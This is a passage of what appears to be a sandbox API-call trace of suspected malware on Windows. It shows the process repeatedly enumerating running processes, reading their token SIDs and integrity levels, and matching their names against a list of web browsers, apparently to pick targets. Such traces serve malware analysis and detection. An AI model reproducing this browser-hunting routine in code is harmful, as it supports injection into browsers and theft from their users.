TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0520.785] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0520.785] GetLastError () returned 0x7a [0520.785] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0520.785] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0520.785] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0520.785] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0520.785] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0520.785] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0520.785] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0520.785] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0520.785] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0520.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0520.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0520.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0520.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x2cc [0520.785] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0520.785] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0520.785] GetLastError () returned 0x7a [0520.785] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0520.785] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0520.785] CloseHandle (hObject=0x5d8) returned 1 [0520.785] CloseHandle (hObject=0x2cc) returned 1 [0520.785] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0520.785] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0520.785] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0520.785] GetLastError () returned 0x7a [0520.785] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0520.785] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0520.785] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0520.785] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0520.786] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0520.786] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0520.786] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0520.786] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0520.786] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0520.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0520.786] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0520.786] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0522.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa1a8) returned 0xc0000004 [0522.795] VirtualAlloc (lpAddress=0x0, dwSize=0xb1a8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0522.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb1a8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0522.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0522.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0522.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0522.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0522.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0522.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0522.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0522.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0522.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0522.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0522.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0522.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0522.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0522.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0522.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0522.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0522.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0522.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0522.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0522.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0522.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2cc [0522.799] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0522.799] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0522.799] GetLastError () returned 0x7a [0522.799] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0522.799] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0522.799] CloseHandle (hObject=0x5d8) returned 1 [0522.800] CloseHandle (hObject=0x2cc) returned 1 [0522.800] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0522.800] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0522.800] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0522.800] GetLastError () returned 0x7a [0522.800] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0522.800] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0522.800] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0522.801] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0522.801] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0522.801] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0522.801] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0522.801] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0522.801] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0522.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0522.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x2cc [0522.801] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0522.801] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0522.801] GetLastError () returned 0x7a [0522.802] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0522.802] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0522.802] CloseHandle (hObject=0x5d8) returned 1 [0522.802] CloseHandle (hObject=0x2cc) returned 1 [0522.802] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0522.802] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0522.802] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0522.802] GetLastError () returned 0x7a [0522.803] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0522.803] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0522.803] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0522.803] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0522.803] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0522.803] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0522.803] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0522.803] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0522.803] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0522.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x2cc [0522.803] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0522.804] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0522.804] GetLastError () returned 0x7a [0522.804] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0522.804] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0522.804] CloseHandle (hObject=0x5d8) returned 1 [0522.804] CloseHandle (hObject=0x2cc) returned 1 [0522.804] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0522.804] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0522.804] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0522.805] GetLastError () returned 0x7a [0522.805] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0522.805] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0522.805] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0522.805] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0522.805] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0522.805] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0522.805] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0522.805] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0522.805] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0522.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0522.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x2cc [0522.806] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0522.806] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0522.806] GetLastError () returned 0x7a [0522.806] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0522.806] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0522.806] CloseHandle (hObject=0x5d8) returned 1 [0522.806] CloseHandle (hObject=0x2cc) returned 1 [0522.807] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0522.807] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0522.807] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0522.807] GetLastError () returned 0x7a [0522.807] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0522.807] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0522.807] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0522.807] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0522.807] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0522.808] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0522.808] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0522.808] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0522.808] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0522.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0522.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0522.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0522.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x2cc [0522.808] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0522.808] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0522.808] GetLastError () returned 0x7a [0522.809] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0522.809] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0522.809] CloseHandle (hObject=0x5d8) returned 1 [0522.809] CloseHandle (hObject=0x2cc) returned 1 [0522.809] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0522.809] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0522.809] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0522.809] GetLastError () returned 0x7a [0522.810] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0522.810] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0522.810] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0522.810] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0522.810] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0522.810] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0522.810] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0522.810] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0522.810] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0522.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0522.810] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0522.811] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0524.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa1a8) returned 0xc0000004 [0524.807] VirtualAlloc (lpAddress=0x0, dwSize=0xb1a8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0524.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb1a8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0524.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0524.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0524.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0524.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0524.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0524.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0524.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0524.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0524.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0524.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0524.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0524.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0524.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0524.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0524.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0524.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0524.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0524.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0524.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0524.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0524.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2cc [0524.811] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0524.811] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0524.811] GetLastError () returned 0x7a [0524.812] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0524.812] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0524.812] CloseHandle (hObject=0x5d8) returned 1 [0524.812] CloseHandle (hObject=0x2cc) returned 1 [0524.812] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, 